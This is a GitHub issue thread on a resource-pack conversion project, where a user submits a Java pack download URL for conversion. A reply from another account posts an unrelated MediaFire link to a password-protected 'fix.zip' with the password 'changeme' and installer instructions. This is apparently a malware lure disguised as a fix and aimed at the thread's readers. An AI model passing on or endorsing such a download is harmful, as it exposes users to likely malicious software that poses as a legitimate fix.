### ISSUE TITLE
[Pack]: 

### ISSUE THREAD

**Issue by JokeFlowers** [Kas-tle/java2bedrock.sh#33345]
### Java Pack Direct Download URL

http://dawnmc.top:30546/generated.zip

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
